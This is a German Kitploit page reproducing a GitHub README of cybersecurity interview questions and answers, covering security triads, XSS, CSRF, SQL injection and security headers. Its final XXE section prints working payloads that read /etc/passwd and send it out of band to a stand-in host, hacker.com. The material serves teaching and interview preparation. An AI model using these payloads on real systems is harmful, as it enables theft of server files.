Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Interview_Tips — Zusammenfassung der Cyber-Security-Interviewfragen, die ich durchgemacht habe, hoffe, das hilft euch weiter. | Kitploit
Tools/GitHubGitHub/jigerjain/interview_tips
WebsicherheitNetzwerksicherheitKryptographieCloud-SicherheitLernen & BildungKuratierte RessourcenLernpfade & KurseBinary-Exploitation
GitHubjigerjain/interview_tips

Interview_Tips

Zusammenfassung der Cyber-Security-Interviewfragen, die ich durchgemacht habe, hoffe, das hilft euch weiter.

Repository anzeigen
691723vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Interview-Tipps (Informationssicherheit)

Diese Seite ist eine Zusammenfassung der Interviews, die ich durchlaufen habe. Sie deckt eine ganze Bandbreite an Rollen ab. Ich habe zwar mehrere Absagen erhalten, aber aus jedem Interview gelernt, konstruktives Feedback gesammelt und bin vorangekommen.
Ich hoffe, diese Fragen/Tipps können dir helfen.

Die Rollen, die es im Allgemeinen abdeckt, sind wie folgt:

  • Praktikum Cybersicherheit
  • Praktikum Penetrationstests / Red Team
  • Praktikum Web-App-/Anwendungssicherheit
  • Praktikum Produktsicherheit
  • Praktikum Infrastruktursicherheit

Kurzer Tipp:

  • Überprüfe deinen Lebenslauf und stelle dir vorab selbst Fragen dazu
  • Wenn dir eine Frage/ein Konzept nicht bekannt ist, weiche dem Thema nicht aus, sondern vermittle, dass du es lernen kannst, wenn du ein Umfeld zum Arbeiten bekommst
    Du kannst nicht alles wissen. Sei bescheiden und gib zu, wenn du etwas falsch beantwortet hast oder eine Klarstellung benötigst
  • Bereite vorab eine kurze Biografie über dich vor, um dich vorzustellen
  • Sei dir über dein Endziel im Klaren und warum Infosec?
  • Frage schließlich am Ende des Interviews nach Feedback, warum, weil: es hilft, die Lücken deines aktuellen Wissens im Bereich Infosec zu erkennen und zu schließen

Ich habe versucht, unten alle möglichen Fragen festzuhalten, auf die ich gestoßen bin, und für einige davon Antworten bereitgestellt.
Den Rest kannst du googeln, wenn du tiefer eintauchen möchtest. Außerdem gibt es am Ende ein paar Referenzen – wirf einen Blick darauf. Die waren wirklich hilfreich.

Ich würde gerne weitere Fragen hinzufügen, während ich vorankomme und meine Notizen durchgehe. Ich würde mich jedoch über konstruktives Feedback freuen, indem du mich über [email protected] kontaktierst. Wenn dir etwas begegnet, das hier nicht abgedeckt ist, teile es bitte gerne mit.

Häufige Fragen

  1. Security-Triaden:

Was ist CIA?

  • Vertraulichkeit
  • Integrität
  • Verfügbarkeit

Was ist AAA?

  • Authentifizierung
  • Autorisierung
  • Accounting
  1. Unterschied zwischen Bedrohung, Schwachstelle, Exploit und Risiko und wie diese mit Assets zusammenhängen
  • Bedrohung:
    Eine Bedrohung ist das, wovor wir uns schützen wollen
  • Schwachstelle:
    Eine Schwachstelle ist eine Schwäche oder Lücke in unseren Schutzbemühungen
  • Exploit:
    Eine Fähigkeit/ein Programm (kann eine Software oder eine Social-Engineering-Fähigkeit sein), das entwickelt wurde, um ein Asset anzugreifen, indem eine Schwachstelle ausgenutzt wird
  • Risiko:
    Risiko ist die Schnittmenge von Assets, Bedrohungen und Schwachstellen
  • Asset:
    Ein Asset ist das, was wir schützen wollen
  1. Was ist IAM und warum wird es verwendet?
    IAM ist Identity Access Management, das verwendet wird, um Rollen und Verantwortlichkeiten innerhalb einer Organisation zu trennen. Es ist ein kritischer Bestandteil der Sicherheit. Es hilft bei der Aufrechterhaltung von Zugriffssicherheit und -privilegien

Sicherheit im Allgemeinen

Phasen eines Netzwerk-Intrusionsangriffs:

  • Aufklärung / Informationssammlung
  • Erlangen des benötigten Zugriffs
  • Aufrechterhalten des Zugriffs
  • Verwischen der Spuren (Löschen von Logs, Backdoors und Verbergen aller Kontrollen)

Webanwendungssicherheit

  1. Häufige Fragen:
  • OWASP Top 10

  • Was ist XSS (Cross-site Scripting)?

    • Übe XSS unter: [https://xss-game.appspot.com/]
    • Wie man XSS bekämpft: Kurz gesagt, verwende eine angemessene Eingabevalidierung
    • Achte auf den CSP-Header (Content-Security-Policy)
    • Verschiedene Arten von XSS: Reflected, Stored und DOM-basiert
    • Was sind Quellen (Sources) und Senken (Sinks) im DOM, die zu XSS führen können:
      [https://www.netsparker.com/blog/web-security/dom-based-cross-site-scripting-vulnerability/]
  • Was ist CSRF? Das ist die schönste Frage, die jeder zweite Interviewer liebend gerne stellt
    Kurzer Tipp: Sei kurz und erkläre die ganze Geschichte nur, wenn danach gefragt wird

    Cross-Site Request Forgery (CSRF) ist ein Angriff, der einen Endbenutzer dazu zwingt, unerwünschte Aktionen in einer Webanwendung auszuführen, bei der er aktuell authentifiziert ist. CSRF-Angriffe zielen speziell auf zustandsverändernde Anfragen, nicht auf Datendiebstahl, da der Angreifer keine Möglichkeit hat, die Antwort auf die gefälschte Anfrage zu sehen. Mit ein wenig Social Engineering (z. B. durch das Senden eines Links per E-Mail oder Chat) kann ein Angreifer die Benutzer einer Webanwendung dazu verleiten, Aktionen auszuführen, die der Angreifer gewählt hat. Wenn das Opfer ein normaler Benutzer ist, kann ein erfolgreicher CSRF-Angriff den Benutzer dazu zwingen, zustandsverändernde Anfragen auszuführen, wie z. B. die Überweisung von Geldern, die Änderung der E-Mail-Adresse usw. Wenn das Opfer ein Administratorkonto ist, kann CSRF die gesamte Webanwendung gefährden.

  • Wie man CSRF bekämpft:
    Verwende Anti-CSRF-Tokens
    Verwende die Same-Origin-Policy
    Verwendung des Referrer-Headers

  • Was ist HTML-/URL-Encoding?

  • Ist das HTTP-Protokoll zustandslos?
    HTTP ist von Natur aus ein zustandsloses Protokoll, der Server verwendet jedoch Cookies, um es zustandsbehaftet zu machen

  • Welche Arten von Injections gibt es: SQL, Command, OS

  • Wie man SQL-Injections bekämpft
    Verwende parametrisierte Abfragen und gespeicherte Prozeduren

  1. Achte auf Header, die zur Sicherheit beitragen (Überprüfe die URLs und arbeite den Inhalt durch, das hilft dir beim Aufbau deiner Grundlagen):
  • CSP (Content-Security Policy) [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy]
    [https://www.html5rocks.com/en/tutorials/security/content-security-policy/]
  • CORS (Cross-Origin Resource Sharing) [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS]
  • Same-Origin-Policy [https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy]
  1. Es gibt seltene Szenarien, in denen ein Interviewer diese Fragen stellt. Ich bin in späteren Phasen einiger Interviews auf die folgenden gestoßen und dachte, ich erwähne sie:
  • Was ist XXE (XML External Entities)?
    XML-External-Entity-Injection (auch bekannt als XXE) ist eine Websicherheits-Schwachstelle, die es einem Angreifer ermöglicht, die Verarbeitung von XML-Daten durch eine Anwendung zu beeinträchtigen. Sie erlaubt einem Angreifer oft, Dateien im Dateisystem des Anwendungsservers einzusehen und mit beliebigen Backend- oder externen Systemen zu interagieren, auf die die Anwendung selbst zugreifen kann.
    Schau dir das an [https://portswigger.net/web-security/xxe]
    z. B.:
    <?xml version="1.0" encoding="UTF-8"?>    
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>     
    <stockCheck><productId>&xxe;</productId></stockCheck> 
    
    In manchen Situationen kann ein Angreifer einen XXE-Angriff eskalieren, um den zugrunde liegenden Server oder andere Backend-Infrastruktur zu kompromittieren, indem er die XXE-Schwachstelle ausnutzt, um Server-Side-Request-Forgery-Angriffe (SSRF) durchzuführen.
  • Out-of-Band: Mithilfe von XML-Entities können Daten vom Server abgegriffen und an hacker.com gesendet werden (KEINE Serverausgabe erforderlich)

Einzufügen in: document.xml

<!DOCTYPE root [
    <!ENTITY % remote SYSTEM "http://hacker.com/evil.dtd">
    %remote; %intern; %xxe;
]>
<root>&xxe;</root> - you can change xxe entity to general entity

Externer Host: http://hacker.com/evil.dtd

<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'http://hacker.com/result-is?%payl;'>">
                    --- OR ---
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'file://%payl;'>"> - consider error-based

Ref: [https://phonexicum.github.io/infosec/xxe.html]

Tool herunterladen